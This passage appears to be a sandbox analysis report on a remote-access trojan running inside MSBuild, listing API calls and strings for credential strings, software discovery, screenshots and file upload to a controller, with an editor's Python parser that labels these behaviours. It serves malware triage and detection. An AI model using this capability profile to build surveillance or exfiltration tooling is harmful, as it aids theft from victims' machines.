• Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
• Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
• Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID: u;~/
• API String ID: 2509303402-1979702588
• Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
• Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
• Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
• Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1D6
• _memcmp.LIBVCRUNTIME ref: 0041B1EE
• lstrlenW.KERNEL32(?), ref: 0041B207
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
• lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
• _wcslen.LIBCMT ref: 0041B2DB
• FindVolumeClose.KERNEL32(?), ref: 0041B2FB
• GetLastError.KERNEL32 ref: 0041B313
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
• lstrcatW.KERNEL32(?,?), ref: 0041B359
• lstrcpyW.KERNEL32(?,?), ref: 0041B368
• GetLastError.KERNEL32 ref: 0041B370
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
• Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
• Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
• Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
• Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
• Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
• Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
• Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
• Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
• Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
• Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
• GetCursorPos.USER32(?), ref: 0041CAF8
• SetForegroundWindow.USER32(?), ref: 0041CB01
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
• ExitProcess.KERNEL32 ref: 0041CB74
• CreatePopupMenu.USER32 ref: 0041CB7A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
• Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
• CloseHandle.KERNEL32(00000000), ref: 00408256
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
• API String ID: 1884690901-3066803209
• Opcode ID: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
• Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
• Opcode Fuzzy Hash: f394d11315419b8f0f9708f62f874e78f478f36e0ca4bb55b67993b1b69a6a64
• Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
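The function blocks above are the raw material for a capability summary: the volume enumeration (FindFirstVolumeW / GetVolumePathNamesForVolumeNameW), the ws2_32/wship6 getaddrinfo resolver, the walk of HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall reading DisplayName/Publisher/UninstallString, the tray icon with a "Close" menu, and the chunked CreateFileW/SetFilePointerEx/ReadFile loop next to "Uploading file to Controller: ". The script below is an added example by the editor, not Joe Sandbox tooling or code from the sample: it parses this block format (the "• Name.MODULE(args), ref: ADDR" entries and the "API ID" / "String ID" records), pulls out the arguments the sandbox resolved to literals, and applies a small rule table that maps API sets to behaviour labels. The rule table and labels are the editor's assumptions, not report output. One caveat the labels encode: the GetSystemDirectoryA, LoadLibraryA("\ws2_32"), then "\wship6", GetProcAddress("getaddrinfo"/"getnameinfo"/"freeaddrinfo") sequence is the legacy wspiapi.h compatibility shim that older Windows SDK builds link in, so on its own it is a compiler-era artefact rather than evidence of deliberate import hiding. The sample text is copied from the blocks above with the leading whitespace and "Download File" residue removed.

```python
"""Parse Joe Sandbox function blocks ("APIs" entries plus the "API ID" / "String ID"
records) and label each function with the behaviour its API set implies.
Added example by the editor, not Joe Sandbox or Remcos code; the rule table and
labels are the editor's own reading of the API sets shown in the report."""
import re
from dataclasses import dataclass, field

# Constructed input: three function blocks copied from the report above (leading
# whitespace and "Download File" residue removed, remaining metadata omitted).
SAMPLE = """\
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \\ws2_32$\\wship6$freeaddrinfo$getaddrinfo$getnameinfo
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall$UninstallString
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
Similarity
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
"""

# "• Name.MODULE(args), ref: ADDR"; the argument list is optional and subcall
# entries carry a "Part of subcall function XXXX:" prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)
META_RE = re.compile(
    r"^•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|Snapshot File):\s*(.*)$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")  # an unresolved numeric argument


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)  # (name, module, [args], ref) in address order
    meta: dict = field(default_factory=dict)  # "API ID", "String ID", "Opcode ID", ...

    @property
    def api_names(self):
        return {name for name, _, _, _ in self.apis}

    @property
    def strings(self):
        # The report joins the referenced strings with '$'.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    @property
    def first_ref(self):
        return self.apis[0][3] if self.apis else None


def parse_blocks(text):
    """Start a new block at every 'APIs' header and collect its API and metadata lines."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            current.apis.append((name, module, args.split(",") if args else [], ref))
            continue
        m = META_RE.match(line)
        if m:
            current.meta[m.group(1)] = m.group(2).strip()
    return blocks


def literal_args(block):
    """Arguments the sandbox resolved to a literal (neither '?' nor a bare 8-digit value)."""
    return [(name, a.strip()) for name, _, args, _ in block.apis for a in args
            if a.strip() and a.strip() != "?" and not HEX_RE.fullmatch(a.strip())]


# (APIs that must all be present, substring that must occur in the block's strings, label)
RULES = [
    ({"RegOpenKeyExA", "RegEnumKeyExA"}, "CurrentVersion\\Uninstall",
     "installed-software discovery via the HKLM Uninstall key"),
    ({"LoadLibraryA", "GetProcAddress"}, "getaddrinfo",
     "getaddrinfo resolved at runtime (ws2_32/wship6 fallback, as in wspiapi.h)"),
    ({"FindFirstVolumeW", "FindNextVolumeW"}, None, "volume/drive enumeration"),
    ({"CreateFileW", "GetFileSizeEx", "SetFilePointerEx", "ReadFile"},
     "Uploading file to Controller", "chunked file read for upload to the C2"),
    ({"Shell_NotifyIconA", "TrackPopupMenu"}, None, "tray icon with a context menu"),
]


def classify(block):
    joined = "\n".join(block.strings)
    return [label for needed, marker, label in RULES
            if needed <= block.api_names and (marker is None or marker in joined)]


def summarize(text):
    """One (address of the first API reference, labels) tuple per function block."""
    return [(b.first_ref, classify(b)) for b in parse_blocks(text)]


if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        print(block.first_ref, "->", "; ".join(classify(block)) or "no rule matched")
        for api, value in literal_args(block):
            print("    literal:", api, "=", value)
```

Feed it the whole function listing of a report and the output is a per-function list of labels plus the literal arguments (registry paths, exported names, file names) that usually matter more for triage than the fuzzy hashes; extending RULES is how you add the keyboard-hook, wallpaper and browser-credential patterns the detection list at the top of the report refers to.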
APIs
• ___free_lconv_mon.LIBCMT ref: 10007D06
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                                                                            • _free.LIBCMT ref: 00450136
                                                                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                                                                            • _free.LIBCMT ref: 00450175
                                                                                                                                            • _free.LIBCMT ref: 00450192
                                                                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                            • API String ID: 489098229-65789007
                                                                                                                                            • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                            • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
